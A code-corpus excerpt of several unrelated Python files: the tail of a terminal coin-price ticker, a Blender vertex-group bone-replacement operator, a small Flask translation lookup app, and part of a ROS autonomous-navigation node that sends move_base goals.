base, quote = bq_pair\n cbg, cfg = colors\n sep = \"/\"\n bg = cbg.shade if lnum % 2 else cbg.tint\n up = \"\\x1b[A\" * lnum + \"\\r\"\n down = \"\\x1b[B\" * lnum\n tick = Dec(client.symbols[sym][\"tick\"])\n last_seen = {}\n #\n # Delay pulsing while staggering initial update\n pulse_over, pulse_delay, pulse = Dec(pulse_over), 5, None\n _pulse_over = Dec(pulse_over + pulse_delay)\n from random import random\n #\n while True:\n # Without this, pulses get backlogged/front-loaded and fire in a\n # fusillade on init, sometimes after a short hang. 
Not sure why.\n if _pulse_over > pulse_over:\n _pulse_over -= Dec(1)\n _wait = random()\n try:\n await asyncio.sleep(_wait)\n except asyncio.CancelledError:\n break\n _wait = wait\n if pulse:\n latest = last_seen\n else:\n latest = decimate(dict(client.ticker[sym]))\n if client.quantize is True:\n for key in (\"last\", \"ask\", \"bid\"):\n latest[key] = latest[key].quantize(tick)\n if snapshots.get(sym) and snapshots[sym] == latest:\n continue\n last_seen = snapshots.setdefault(sym, latest)\n # Better to save as decimal quotient and only display as percent\n change = ((latest[\"last\"] - latest[\"open\"]) / latest[\"open\"])\n latest[\"chg\"] = change\n # Use explicit value for ``normal`` instead of ``\\e[39m`` to reset\n clrs = dict(_beg=bg, _sym=cfg.dim, _sepl=cfg.normal,\n _sepr=cfg.dim, _prc=cfg.normal, _vol=cfg.dim,\n _chg=\"\", _end=\"\\x1b[m\\x1b[K\")\n clrs[\"_chg\"] = (cfg.red if change < 0 else\n cfg.green if change > 0 else clrs[\"_vol\"])\n #\n volconv = None\n if VOL_UNIT:\n volconv = _convert_volume(client, sym, base, quote, latest)\n #\n if pulse:\n if HAS_24:\n clrs[\"_beg\"] = (cbg.mix_green if\n pulse == \"+\" else cbg.mix_red)\n else:\n clrs[\"_beg\"] = bg\n clrs[\"_prc\"] = clrs[\"_chg\"] = (\n cfg.bright_green if pulse == \"+\" else cfg.bright_red\n )\n clrs[\"_vol\"] = cfg.green if pulse == \"+\" else cfg.red\n _wait = 0.124 if PULSE == \"fast\" else 0.0764\n pulse = None\n elif latest[\"time\"] is None:\n clrs.update(dict(_sym=cfg.dark, _sepl=\"\", _sepr=\"\",\n _prc=(cfg.faint_shade if lnum % 2 else\n cfg.faint_tint), _vol=\"\", _chg=\"\"))\n change, pulse = 0, None\n # Must divide by 100 because ``_pulse_over`` is a %\n elif (abs(abs(latest[\"last\"]) - abs(last_seen[\"last\"])) >\n abs(_pulse_over / 100 * last_seen[\"last\"])):\n pulse = None\n _wait = 0.0764 if PULSE == \"fast\" else 0.124\n if change - last_seen[\"chg\"] > 0:\n pulse = \"+\"\n clrs[\"_beg\"] = cbg.green\n if not HAS_24:\n clrs.update(dict(_sym=cfg.green, _sepl=\"\", _sepr=\"\",\n _vol=\"\", _prc=\"\", _chg=\"\"))\n else:\n pulse = \"-\"\n clrs[\"_beg\"] = cbg.red\n if not HAS_24:\n clrs.update(dict(_sym=cfg.red, _sepl=\"\", _sepr=\"\",\n _vol=\"\", _prc=\"\", _chg=\"\"))\n try:\n with await semaphore:\n print(up,\n fmt.format(\"\", \"\", base=base.lower(), sep=sep,\n quote=quote.lower(), **clrs, **latest,\n volconv=volconv),\n down,\n sep=\"\", end=\"\", flush=True)\n except asyncio.CancelledError:\n break\n last_seen.update(latest)\n #\n return \"Cancelled _paint_ticker_line for: %s\" % sym\n\n\nasync def do_run_ticker(ranked, client, loop, manage_subs=True,\n manage_sigs=True):\n \"\"\"\n Common keys::\n\n \"ask\", \"bid\", \"last\", \"open\", \"volB\",\n \"volQ\", \"time\", \"sym\", \"chg\", \"chgP\"\n\n The value of ``open`` is that of ``last`` from 24 hours ago and is\n continuous/\"moving\". This can't be gotten with the various ``*Candle``\n calls because the limit for ``period=\"M1\"`` is 1000, but we'd need 1440.\n \"\"\"\n if manage_sigs:\n # Actually unnecessary since existing uses default handler\n old_sig_info = remove_async_sig_handlers(\"SIGINT\", loop=loop).pop()\n\n def rt_sig_cb(**kwargs):\n kwargs.setdefault(\"msg\", \"Received SIGINT, quitting\")\n out_futs.update(kwargs)\n if not all(t.cancelled() for t in tasks):\n client.echo(\"Cancelling tasks\")\n for task in tasks:\n task.cancel()\n # Not sure if this can ever run. Thinking is if user sends multiple\n # SIGINTs in rapid succession. Tried naive test w. 
kill util.\n # Didn't trigger, but need to verify.\n else:\n client.echo(\"Already cancelled: %r\" % gathered)\n loop.call_later(0.1,\n client.echo, \"Cancelled tasks: %r\" % tasks)\n add_async_sig_handlers(old_sig_info, loop=loop)\n\n # No need to partialize since ``gathered``, which ``rt_sig_cb``\n # should have closure over once initialized below, will be the same\n # object when the trap is sprung\n add_async_sig_handlers((\"SIGINT\", rt_sig_cb), loop=loop)\n #\n c_fg = client.foreground_256\n c_bg = client.background_256\n if HAS_24:\n if client.foreground_24 is None:\n globals()[\"HAS_24\"] = False\n else:\n c_fg = client.foreground_24\n c_bg = client.background_24\n #\n all_subs = set(ranked)\n # Ensure conversion pairs available for all volume units\n if VOL_UNIT:\n if \"USD\" not in VOL_UNIT and VOL_UNIT not in client.markets:\n # XXX should eventually move this block somewhere else\n return {\"error\": \"%r is not a market currency supported by %s\" %\n (VOL_UNIT, client.exchange)}\n if manage_subs:\n if VOL_UNIT == \"USD\" and \"USD\" not in client.markets:\n assert \"USDT\" in client.markets\n globals()[\"VOL_UNIT\"] = \"USDT\"\n all_subs |= await client.get_market_conversion_pairs(VOL_UNIT)\n else:\n client.echo(\"The ``VOL_UNIT`` option requires ``manage_subs``\", 3)\n globals()[\"VOL_UNIT\"] = None\n #\n # Results to return\n out_futs = {}\n #\n # Abbreviations\n cls, clt = client.symbols, client.ticker\n #\n if manage_subs:\n await asyncio.gather(*map(client.subscribe_ticker, all_subs))\n max_tries = 3\n while max_tries:\n if all(s in clt and s in cls for s in ranked):\n break\n await asyncio.sleep(1)\n max_tries -= 1\n else:\n out_futs[\"subs\"] = await asyncio.gather(\n *map(client.unsubscribe_ticker, all_subs)\n )\n out_futs[\"error\"] = \"Problem subscribing to remote service\"\n return out_futs\n #\n # TODO determine practicality of using existing volume rankings reaped\n # during arg parsing via in ``choose_pairs()``\n if VOL_UNIT and VOL_SORTED:\n vr = sorted((_convert_volume(client, s, cls[s][\"curB\"], cls[s][\"curQ\"],\n decimate(clt[s])), s)\n for s in ranked)\n ranked = [s for v, s in vr]\n #\n # Arbitrarily assume biggest volume and/or change could grow 10x between\n # open/close, so +1 for those.\n #\n # TODO move all this widths figuring to a separate coro that updates some\n # shared location at regular intervals. If max column width is exceeded,\n # just lower precision for the offending item. 
So, if some \"change\" value\n # were to grow from 99.99 to 100.00, make it 100.0 instead.\n sep = \"/\"\n volstr = \"Vol (%s)\" % (VOL_UNIT or \"base\") + (\" \" if VOL_UNIT else \"\")\n if VOL_UNIT:\n try:\n vprec = \"USD ETH BTC\".split().index(VOL_UNIT)\n except ValueError:\n vprec = 0 # Covers USDT and corners like BNB, XRP, BCH\n # Market (symbol) pairs will be \"concatenated\" (no intervening padding)\n sym_widths = (\n # Base\n max(len(cls[s][\"curB\"]) for s in ranked),\n # Sep\n len(sep),\n # Quote (corner case: left-justifying, so need padding)\n max(len(cls[s][\"curQ\"]) for s in ranked)\n )\n # Can't decide among exchange name, \"\" (blank), \"Pair,\" and \"Product\"\n widths = (\n # 1: Exchange name\n max(sum(sym_widths), len(client.exchange)),\n # 2: Price\n max(len(\"{:.2f}\".format(Dec(clt[s][\"last\"])) if\n \"USD\" in s else clt[s][\"last\"]) for s in ranked),\n # 3: Volume\n max(*(len(\"{:,.{pc}f}\"\n .format(_convert_volume(client, s, cls[s][\"curB\"],\n cls[s][\"curQ\"], decimate(clt[s])),\n pc=vprec) if VOL_UNIT else clt[s][\"volB\"])\n for s in ranked), len(volstr)),\n # 4: Bid\n max(len(\"{:.2f}\".format(Dec(clt[s][\"bid\"])) if\n \"USD\" in s else clt[s][\"bid\"]) for s in ranked),\n # 5: Ask\n max(len(\"{:.2f}\".format(Dec(clt[s][\"ask\"])) if\n \"USD\" in s else clt[s][\"ask\"]) for s in ranked),\n # 6: Change (should maybe do max++ for breathing room)\n max(len(\"{:+.3f}%\".format(\n (Dec(clt[s][\"last\"]) - Dec(clt[s][\"open\"])) / Dec(clt[s][\"open\"])\n )) for s in ranked),\n )\n pad = 2\n widths = (pad, # <- 0: Left padding\n *(l + pad for l in widths),\n pad) # <- 7: Right padding\n del cls, clt\n #\n # Die nicely when needed width exceeds what's available\n if sum(widths) > os.get_terminal_size().columns:\n msg = (\"Insufficient terminal width. 
Need %d more column(s).\"\n % (sum(widths) - os.get_terminal_size().columns))\n out_futs[\"error\"] = msg\n if manage_subs:\n out_futs[\"subs\"] = await asyncio.gather(\n *map(client.unsubscribe_ticker, all_subs)\n )\n return out_futs\n # Format string for actual line items.\n fmt_parts = [\n \"{_beg}{:%d}\" % widths[0],\n \"{_sym}{base}{_sepl}{sep}{_sepr}{quote:<{quote_w}}\",\n \"{_prc}{last:<%df}\" % widths[2],\n \"{_vol}\" + (\"{volconv:>%d,.%df}%s\" %\n (widths[3] - pad, vprec, \" \" * pad) if\n VOL_UNIT else \"{volB:<%df}\" % widths[3]),\n \"{bid:<%df}\" % widths[4],\n \"{ask:<%df}\" % widths[5],\n \"{_chg}{chg:>+%d.3%%}\" % widths[6],\n \"{:%d}{_end}\" % widths[7]\n ]\n fmt = \"\".join(fmt_parts)\n #\n _print_heading(client, (c_bg, c_fg), widths, len(ranked), volstr)\n #\n semaphore = asyncio.Semaphore(1)\n snapshots = {}\n coros = []\n for lnum, sym in enumerate(ranked):\n base = client.symbols[sym][\"curB\"]\n quote = client.symbols[sym][\"curQ\"]\n fmt_nudge = (\n \"\".join(\n (fmt_parts[n].replace(\"f}\", \".2f}\") if n in (1, 4, 5) else\n fmt_parts[n] for n in range(len(fmt_parts)))\n )\n if \"USD\" in quote and Dec(client.ticker[sym][\"last\"]) >= Dec(10)\n else fmt\n ).replace(\"{quote_w}\", \"%d\" % (widths[1] - len(base) - len(sep)))\n #\n coros.append(_paint_ticker_line(\n client, lnum, sym, semaphore, snapshots, fmt_nudge,\n (c_bg, c_fg), (base, quote), wait=(0.1 * len(ranked)),\n pulse_over=(PULSE_OVER if PULSE else 100.0)\n ))\n # Should conversion pairs (all_subs) be included here if not displayed?\n ts_chk = _check_timestamps(all_subs, client, rt_sig_cb, STRICT_TIME)\n #\n tasks = [asyncio.ensure_future(c) for c in (*coros, ts_chk)]\n gathered = asyncio.gather(*tasks)\n #\n try:\n out_futs[\"gathered\"] = await gathered\n except Exception as exc:\n # Repr of ``Future.exception`` only contains exc name\n out_futs[\"gathered\"] = gathered.exception()\n from traceback import print_exc, format_exc\n if LOGFILE:\n print_exc(file=LOGFILE)\n elif not isinstance(exc, asyncio.CancelledError):\n out_futs[\"gathered\"] = {\"error\": format_exc()}\n finally:\n if manage_subs:\n client.echo(\"Unsubscribing\", 6)\n gunsubs = asyncio.gather(*map(client.unsubscribe_ticker, all_subs))\n try:\n out_futs[\"subs\"] = await gunsubs\n # Catch network/inet errors, etc.\n except Exception:\n from traceback import print_exc, format_exc\n if LOGFILE:\n out_futs[\"subs\"] = gunsubs.exception()\n print_exc(file=LOGFILE)\n else:\n tb_str = format_exc()\n if \"ConnectionClosed\" not in tb_str:\n out_futs[\"subs\"] = {\"error\": tb_str}\n if manage_sigs:\n add_async_sig_handlers(old_sig_info, loop=loop)\n return out_futs\n\n\nasync def choose_pairs(client):\n \"\"\"\n If the length of named pairs alone exceeds the terminal height, trim\n from the end (rightmost args). Afterwards, reduce NUM leaders, as\n required. Print a warning for dropped syms if AUTO_CULL is on,\n otherwise raise a ValueError. Note: This will probably have to be\n redone when argparse stuff is added.\n \"\"\"\n num = None\n syms = []\n msg = []\n #\n if len(sys.argv) == 1:\n num = min(MAX_FILL, MAX_HEIGHT)\n elif sys.argv[1].isdigit():\n num = int(sys.argv[1])\n if num == 0: # Don't auto-fill regardless of AUTO_FILL\n num = None\n syms = sys.argv[2:]\n else:\n syms = sys.argv[1:]\n if AUTO_FILL: # ... 
till MAX_FILL (or MAX_HEIGHT)\n num = 0\n #\n ranked = []\n num_skipped = 0\n # Need to preserve order, so can't use set union here\n for sym in reversed(syms):\n try:\n symbol = await client.canonicalize_pair(sym)\n except ValueError as e:\n # Could use ``warnings.warn`` for stuff like this\n msg += [\"%r not found, removing...\" % sym]\n if AUTO_FILL:\n num_skipped += 1\n else:\n if symbol not in ranked:\n ranked.append(symbol)\n #\n if len(ranked) > MAX_HEIGHT:\n msg += [\"Too many pairs requested for current terminal height. \"\n \"Over by %d.\" % (len(ranked) - MAX_HEIGHT)]\n if not AUTO_CULL:\n raise ValueError(msg)\n culled = ranked[-1 * (len(ranked) - MAX_HEIGHT):]\n ranked = ranked[:-1 * len(culled)]\n msg += [\"\\nAUTO_CULL is on; dropping the following: \"\n + \", \".join(culled).rstrip(\", \")]\n #\n if num == 0:\n num = min(MAX_FILL, MAX_HEIGHT) - len(ranked)\n elif num is not None:\n if num + len(ranked) > MAX_HEIGHT:\n num = MAX_HEIGHT - len(ranked)\n msg += [\"Too many NUM leaders requested for current terminal \"\n \"height; reducing to %d\" % num]\n elif num_skipped:\n num = min(num + num_skipped, MAX_HEIGHT - len(ranked))\n #\n if msg:\n if LOGFILE:\n client.echo(\"\\n\".join(msg))\n else:\n print(*msg, sep=\"\\n\", file=sys.stderr)\n from time import sleep\n sleep(1)\n #\n if not AUTO_FILL or not num: # <- num might have been decremented to 0\n return ranked\n assert len(ranked) + num <= MAX_HEIGHT\n #\n # If VOL_SORTED is False, named pairs will be appear above ranked ones\n for symbol in await client.get_volume_leaders():\n if symbol not in ranked:\n ranked.append(symbol)\n num -= 1\n if num < 1:\n break\n return ranked\n\n\nasync def main(loop, Client):\n async with Client(VERBOSITY, LOGFILE, USE_AIOHTTP) as client:\n #\n ranked_syms = await choose_pairs(client)\n #\n rt_fut = do_run_ticker(ranked_syms, client, loop)\n return await rt_fut\n\n\ndef main_entry():\n global HAS_24, LOGFILE, PULSE, PULSE_OVER, HEADING, MAX_HEIGHT, \\\n STRICT_TIME, VERBOSITY, VOL_SORTED, VOL_UNIT, USE_AIOHTTP, \\\n AUTO_FILL, AUTO_CULL, EXCHANGE, MAX_FILL\n #\n if sys.platform != 'linux':\n raise SystemExit(\"Sorry, but this probably only works on Linux\")\n if sys.version_info < (3, 6):\n raise SystemExit(\"Sorry, but this thing needs Python 3.6+\")\n #\n if len(sys.argv) > 1 and sys.argv[1] in (\"--help\", \"-h\"):\n print(__doc__.partition(\"\\nWarn\")[0].partition(\"::\\n\")[-1])\n with open(__file__) as f:\n hunks = f.read().split(\"\\n\\n\")\n lines = [p for p in hunks if\n p.startswith(\"# Env vars\")].pop().split(\"\\n\")[1:]\n from ast import literal_eval\n fmt = \"{:<4}{:<12}{:<8}{:<9}{}\"\n for line in lines:\n name, rest = line.split(\"=\")\n val, doc = rest.split(\"#\")\n typ = \"<%s>\" % type(literal_eval(val.strip())).__name__\n val = (\"%s\" % val.strip('\" ').replace(\"True\", \"1\")\n .replace(\"False\", \"0\").replace(\"None\", \"''\"))\n print(fmt.format(\"\", name.strip(), typ, val, doc.strip()))\n sys.exit()\n #\n VERBOSITY = int(os.getenv(\"VERBOSITY\", VERBOSITY))\n USE_AIOHTTP = any(s == os.getenv(\"USE_AIOHTTP\", str(USE_AIOHTTP)).lower()\n for s in \"yes true 1\".split())\n HAS_24 = (\n any(s == os.getenv(\"COLORTERM\", \"\") for s in (\"24bit\", \"truecolor\")) or\n any(s == os.getenv(\"HAS_24\", str(HAS_24)).lower() for\n s in \"24bit truecolor yes on true 1\".split())\n )\n STRICT_TIME = any(s == os.getenv(\"STRICT_TIME\", str(STRICT_TIME)).lower()\n for s in \"yes on true 1\".split())\n PULSE = os.getenv(\"PULSE\", PULSE)\n if PULSE.lower() in \"0 off false 
no null none\".split():\n PULSE = None\n PULSE_OVER = float(os.getenv(\"PULSE_OVER\", PULSE_OVER))\n _heading = os.getenv(\"HEADING\", HEADING)\n HEADING = (_heading if _heading in Headings.__members__ else HEADING)\n MAX_HEIGHT = os.get_terminal_size().lines - Headings[HEADING].value\n VOL_SORTED = any(s == os.getenv(\"VOL_SORTED\", str(VOL_SORTED)).lower()\n for s in \"yes on true 1\".split())\n VOL_UNIT = os.getenv(\"VOL_UNIT\", VOL_UNIT)\n if VOL_UNIT.lower() in (\"\", \"null\", \"none\"):\n VOL_UNIT = None\n else:\n VOL_UNIT = VOL_UNIT.upper()\n AUTO_FILL = any(s == os.getenv(\"AUTO_FILL\", str(AUTO_FILL)).lower()\n for s in \"yes on true 1\".split())\n AUTO_CULL = any(s == os.getenv(\"AUTO_CULL\", str(AUTO_CULL)).lower()\n for s in \"yes on true 1\".split())\n MAX_FILL = os.getenv(\"MAX_FILL\", str(MAX_FILL))\n if MAX_FILL.isdigit():\n MAX_FILL = int(MAX_FILL)\n else:\n MAX_FILL = MAX_HEIGHT\n #\n loop = asyncio.get_event_loop()\n add_async_sig_handlers(\"SIGINT SIGTERM\".split(), loop=loop)\n #\n LOGFILE = os.getenv(\"LOGFILE\", None)\n #\n # XXX should probably print message saying exchange not yet supported\n EXCHANGE = os.getenv(\"EXCHANGE\", EXCHANGE).lower()\n if EXCHANGE == \"binance\":\n Client = binance.BinanceClient\n else:\n Client = hitbtc.HitBTCClient\n #\n # Since this doesn't use curses, shell out to get cursor vis\n # escape sequences, if supported (absent in ansi and vt100).\n civis = cnorm = \"\"\n from subprocess import check_output\n try:\n civis = check_output([\"tput\", \"civis\"]).decode()\n cnorm = check_output([\"tput\", \"cnorm\"]).decode()\n except FileNotFoundError:\n pass\n else:\n print(civis, end=\"\", flush=True)\n #\n try:\n if LOGFILE and os.path.exists(LOGFILE):\n from contextlib import redirect_stderr\n with open(os.getenv(\"LOGFILE\"), \"w\") as LOGFILE:\n with redirect_stderr(LOGFILE):\n ppj(loop.run_until_complete(main(loop, Client)),\n file=LOGFILE)\n else:\n VERBOSITY = 3\n results = loop.run_until_complete(main(loop, Client))\n for item in (results, results.get(\"gathered\", {}),\n results.get(\"subs\", {})):\n try:\n print(\"\", item[\"error\"], sep=\"\\n\", file=sys.stderr)\n except (TypeError, KeyError):\n pass\n # XXX not sure why this was ever added\n except RuntimeError as e:\n if \"loop stopped before Future completed\" not in str(e):\n raise\n elif LOGFILE:\n print(e, file=LOGFILE)\n finally:\n print(cnorm, \"\\x1b[K\")\n\n\nif __name__ == \"__main__\":\n sys.exit(main_entry())\n\n# Copyright 2017 Jane Soko <boynamedjane@misled.ml>\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n","repo_name":"poppyschmo/terminal-coin-ticker","sub_path":"terminal_coin_ticker/ticker.py","file_name":"ticker.py","file_ext":"py","file_size_in_byte":30746,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"2188771070","text":"import bpy\nimport bmesh\nfrom .check_weights import SHKI_OT_CheckWeights\nfrom bmesh.types import BMVert\n\ndef list_vertex_groups_all(self, context):\n return [(str(i), 
g.name, \"Group\") for i, g in enumerate(context.edit_object.vertex_groups)]\n\ndef list_vertex_groups_selected(self, context):\n selected_groups = set()\n\n obj = bpy.context.edit_object\n bm = bmesh.from_edit_mesh(obj.data)\n verts = [v for v in bm.verts if v.select and not v.hide]\n\n for g in obj.vertex_groups:\n for v in verts:\n try:\n g.weight(v.index)\n selected_groups.add(g)\n break\n except:\n pass # move along\n\n return [(str(i), g.name, \"Group\") for i, g in enumerate(context.edit_object.vertex_groups) if g in selected_groups]\n\n\nclass SHKI_OT_ReplaceBone(bpy.types.Operator):\n \"\"\"Move verts from one group to another with the same weights\"\"\"\n bl_idname = \"shurushki.replace_bone\"\n bl_label = \"Replace Bone\"\n\n\n p_from: bpy.props.EnumProperty(name=\"From\", items=list_vertex_groups_selected, description=\"Bone that is replaced\")\n p_to: bpy.props.EnumProperty(name=\"To\", items=list_vertex_groups_all, description=\"Bone that replaces\") # ahem\n\n\n @classmethod\n def poll(cls, context):\n if context.mode != 'EDIT_MESH':\n return False\n\n obj = context.edit_object\n return obj is not None and obj.data is not None\n\n\n def execute(self, context):\n obj = bpy.context.edit_object\n bm = bmesh.from_edit_mesh(obj.data)\n verts = [v for v in bm.verts if v.select and not v.hide]\n weights = bm.verts.layers.deform.active\n\n i_from = int(self.p_from)\n i_to = int(self.p_to)\n\n changed = 0\n \n for v in verts:\n if i_from in v[weights]:\n changed += 1\n v[weights][i_to] = v[weights][i_from]\n del v[weights][i_from]\n \n # apply changes\n bmesh.update_edit_mesh(obj.data)\n\n self.report({'INFO'}, f\"Changed {changed} verts\")\n\n return {'FINISHED'}\n \n\n def invoke(self, context, event):\n if list_vertex_groups_selected(self, context):\n wm = context.window_manager\n return wm.invoke_props_dialog(self)\n \n self.report({'INFO'}, f\"Verts aren't attached to a bone\")\n return {'CANCELLED'}","repo_name":"lampysprites/shurushki-blender-scripts","sub_path":"replace_bone.py","file_name":"replace_bone.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"582332658","text":"import json\r\nfile = open(\"data.txt\",mode = \"r\", encoding = \"utf-8\")\r\ndata = json.load(file)\r\nfile.close()\r\n\r\n#flask\r\nfrom flask import * #载入flask\r\napp = Flask(\"My Website\") #建立一个网站应用程序物件\r\n#网址网站http:/主机名称/路径?参数名称=资料&参数名称=资料&...\r\n#https://minwen.herokuapp.com/\r\n@app.route(\"/\") #指定对应网址路径\r\ndef home(): #对应的处理函式\r\n return render_template(\"home.html\") #回应给前端的信息\r\n\r\n#eg:https://minwen.herokuapp.com/test.php?keyword=关键字\r\n@app.route(\"/test.php\") #指定对应网址路径\r\ndef test(): #对应的处理函式\r\n #取得网址列上参数:request.args.get(\"参数名称\". 预设值)\r\n keyword = request.args.get(\"keyword\", None)\r\n if keyword == None:\r\n return redirect(\"/\")\r\n else:\r\n if keyword in data:\r\n return render_template(\"result.html\",result = data[keyword])\r\n else:\r\n return render_template(\"result.html\",result = \"没有翻译\")\r\nif __name__==\"__main__\": #如果以主程式执行,立即启动服务器\r\n app.run() #启动服务器 #ctrl+c--暂停\r\n","repo_name":"minwen0226/LINEROT","sub_path":"HIIII/wie.py","file_name":"wie.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17880307588","text":"#!/usr/bin/env python\n\n\"\"\"\n.. 
module:: go_to_desired_pos\n    :platform: Unix\n    :synopsis: Python node for the robot's autonomous driving capabilities.\n\n.. moduleauthor:: Fabio Conti <s4693053@studenti.unige.it>\n\nSubscribes to:\n    /odom (`nav_msgs/Odometry`), the topic where the simulator publishes the robot position.\n\nAction:\n    MoveBaseAction\n    MoveBaseGoal\n\nThis node implements the autonomous driving capability. The script exploits an *action client* (*actionlib* library) instance to establish direct communication with the mobile robot and to set and cancel location goals.\n\nThe action client and server communicate via the \"ROS Action Protocol\", which is built on top of ROS messages. The client and server then provide a simple API for users to request goals (on the client side) or to execute goals (on the server side) via function calls and callbacks.\nThroughout the coding of this node I implemented only the *ActionClient* side of the whole structure, using the already existing server of the following action messages:\n\n* ``MoveBaseAction``\n* ``MoveBaseGoal``\n\nFor the client and server to communicate, a few messages have to be defined: the Goal, Feedback, and Result messages. Throughout the coding, I only used the Goal message because that was the one message needed to fulfil the project's aim.\n\nThanks to the actionlib feature, an ActionServer receives the goal message from an ActionClient. In the case of my project, the goal is to move the robot's base position. The goal is a MoveBaseGoal message that contains information about where the robot should move to in the world. For controlling the robot's position in space, the goal contains the *target_pose* parameters (stamp, orientation, target position, etc.).\n\n\"\"\"\n\n# library imports\nimport actionlib\nfrom move_base_msgs.msg import MoveBaseAction, MoveBaseGoal\nfrom geometry_msgs.msg import Twist, Point\nfrom nav_msgs.msg import Odometry\nfrom tf import transformations\nfrom std_srvs.srv import *\nimport time\nimport math\nimport rospy\n\n\nst=\" \"\n\nflag_goal = 0\n\"\"\"\nGlobal variable for defining the current node state.\n\"\"\"\n\n\ndef update_variables(): \n\t\"\"\"\n\tFunction that constantly updates the driving parameters and assigns them to their global variables.\n\t\n\tNo Args \n\t\n\tNo Returns\n\t\"\"\"\n\tglobal desired_position_x, desired_position_y, active_\n\tactive_ = rospy.get_param('active')\n\tdesired_position_x = rospy.get_param('des_pos_x')\n\tdesired_position_y = rospy.get_param('des_pos_y')\n\n\ndef clbk_odom(msg): \n\t\"\"\"\n\tCallback for the odometry topic, needed to retrieve the current x/y position of the robot in the environment.\n\tThe information about the odometry position of the robot is assigned to the global `position_` variable. \n\tArgs:\n\t    msg (nav_msgs/Odometry): the message containing the current x/y position of the robot in the environment.\n\t\n\tNo Returns\n\t\"\"\"\n\n\tglobal position_\n\tposition_ = msg.pose.pose.position\n\t\n\ndef done_cb(status,result):\n\t\"\"\"\n\tCallback function for retrieving information about the status of the robot once the goal position is reached.\n\tOnce the holonomic robot reaches the goal, the flag_goal variable changes value to 1. 
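(In actionlib's GoalStatus convention, status code 3 is the SUCCEEDED terminal state, which is what this callback checks for.) 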
This change will set the modality to the **idle state**.\n\n\tArgs:\n\t    status (actionlib GoalStatus): integer code corresponding to the terminal state.\n\t    result (MoveBaseResult): result of the goal processing.\n\t\n\tNo Returns\n\t\"\"\"\n\tglobal flag_goal\n\t\n\tif status==3:\n\t\tprint(\"\\033[1;34;40m goal achieved!\"+st+\"\\033[0;37;40m \\n\")\n\t\tflag_goal = 1\n\t\n\ndef action_client_set_goal():\n\t\"\"\"\n\tFunction for setting a new goal through the use of the action client.\n\tThe `send_goal` function will activate the reaching of the robot's target, keeping track of the action through the callback *done_cb*. \n\t\n\tNo Args \n\t\n\tNo returns\n\t\"\"\"\n\n\tgoal.target_pose.pose.position.x = desired_position_x\n\tgoal.target_pose.pose.position.y = desired_position_y\n\tprint(\"\\033[1;33;40m START AUTONOMOUS DRIVE\"+st+\"\\033[0;37;40m \\n\")\n\tclient.send_goal(goal,done_cb)\n\ndef action_client_init():\n\t\"\"\"\n\tFunction for the initialization of the action client and of the goal message that will be sent to the action server through the client.\n\tThe goal message is of the type ``MoveBaseGoal``. This type of message will contain all the information about the way the robot will reach the set target. \n\tIn this function only some general goal info is set.\n\t\n\tNo Args\n\t\n\tNo returns\n\t\"\"\"\n\n\tglobal client \n\tglobal goal \n\t\n\tclient = actionlib.SimpleActionClient('move_base',MoveBaseAction) # Initialization of the action client.\n\tclient.wait_for_server()\t\t\t\t\t\t\t# Waiting for the server to get ready.\n\t\n\tgoal = MoveBaseGoal() \t\t\t\t\t\t# Initialization of the goal message.\n\tgoal.target_pose.header.frame_id = \"map\"\t\t# Setting up some parameters of the goal message.\n\tgoal.target_pose.header.stamp = rospy.Time.now()\n\tgoal.target_pose.pose.orientation.w = 1.0\n\t\ndef my_callback_timeout(event):\n\t\"\"\"\n\tCallback function used for setting up a timeout for the robot's current task.\n\tThis function will be activated only if the robot doesn't reach the desired position target within a 1min time span.\n\tThe global parameter `active` will be set back to 0, resetting the status of the whole controller structure.\n\n\tArgs:\n\t    event (rospy.timer.TimerEvent): timing information for the timer callback. \n\t\n\tNo Returns\n\t\"\"\"\n\n\tif active_==1:\n\t\tprint (\"\\033[1;31;40m Goal time expired\\033[0;37;40m :\" + str(event.current_real)+st)\n\t\tprint(\"The robot didn't reach the desired position target within a 1min time span\\n\")\n\t\trospy.set_param('active', 0)\n\t\t\ndef main():\n\t\"\"\"\n\tFunction for managing the state of the robot. \n\tAfter the initialization of the node and the assignment of the subscriber callback, the main while loop will start spinning. Throughout this loop the node will call the previously mentioned functions according to the current state set by the user through the global parameters. 
Also, some messages will be printed to the shell during execution.\n\t\n\tNo returns\n\t\"\"\"\n\t\n\tactive_ = rospy.get_param('active')\n\t\"\"\"\n\tParameter retrieved for keeping track of the current driving modality.\n\t\"\"\"\n\tdesired_position_x = rospy.get_param('des_pos_x')\n\t\"\"\"\n\tParameter retrieved for assigning the x coordinate of the goal location.\n\t\"\"\"\n\tdesired_position_y = rospy.get_param('des_pos_y')\n\t\"\"\"\n\tParameter retrieved for assigning the y coordinate of the goal location.\n\t\"\"\"\n\t\n\tglobal flag_goal\n\trospy.init_node('go_to_desired_pos')\t\t\t\t# Initialization of the node.\n\tsub_odom = rospy.Subscriber('/odom', Odometry, clbk_odom)\t# Subscription to the odometry callback.\n\trate = rospy.Rate(10)\t\t\t\t\t\t\t# Loop rate (10 Hz).\n\tflag = 0\t\t\t\t\t\t\t\t\t# Flags needed for keeping track of the current state of the driving modalities.\n\tflag_2 = 0\n\t\n\taction_client_init()\t\t# Initialization of the action client.\n\t\n\ti = 0\t\t\t\t\t# Counter used to throttle the on-screen position printout\n\twhile(1):\n\t\n\t\tupdate_variables()\t# Variables update at every loop cycle.\n\t\t\n\t\t# If the active_ parameter is set by the user to 1, the node will get to the active state.\n\t\tif active_==1:\n\t\t\t\n\t\t\tif flag == 1:\n\t\t\t\taction_client_set_goal()\t\t\t\t\t# The new goal position will be set.\n\t\t\t\trospy.Timer(rospy.Duration(60),my_callback_timeout) \t# The time-out will start. \n\t\t\t\t\n\t\t\t\tflag = 0\n\t\t\t\tflag_2 = 1\n\t\t\t\n\t\t\n\t\telse:\n\t\t\t# Initial idle state \n\t\t\tif flag == 0 and 